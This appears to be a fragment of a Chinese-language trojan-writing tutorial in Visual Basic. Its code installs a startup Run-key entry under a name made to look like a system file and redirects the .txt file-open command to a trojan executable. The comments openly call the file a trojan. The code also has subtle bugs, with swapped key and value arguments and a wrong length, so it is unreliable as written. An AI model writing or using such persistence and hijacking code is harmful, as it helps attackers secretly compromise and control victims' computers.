Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, _
                                      ByVal bScan As Byte, _
                                      ByVal dwFlags As Long, _
                                      ByVal dwExtraInfo As Long)

''''写到注册表启动组中的过程
Public Sub StartupGroup()
    Dim skey As String
    Dim result As Long
    Dim hKeyID As Long
    Dim skeyVal As String
    ''''启动组中的键,找一个与系统文件相近的。
    skey = "Systrsy"
    ''''木马文件的路径，可以用GetSystemDirectory来取得系统路径。
    skeyVal = "C:\winnt\system32\systrsy.exe"
    result = RegOpenKey(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", hKeyID)
    If result = 0 Then
        Debug.Print hKeyID & "/n"
        result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, skeyVal, Len(skey) + 1)
        Debug.Print result & "/n"
    End If
End Sub

''''与txt文件进行关联
Public Sub WriteToTxt()
    Dim result As Long
    Dim hKeyID As Long
    Dim skey As String
    Dim skeyVal As String
    skey = "txtfile\shell\open\command"
    skeyVal = "C:\windows\system\txtView.exe"
    result = RegOpenKey(HKEY_CLASSES_ROOT, skeyVal, hKeyID)
    If result = 0 Then
        Debug.Print hKeyID & "/n"
        result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, skeyVal, Len(skeyVal) + 1)
        Debug.Print result
    End If

End Sub

上一页  [1] [2]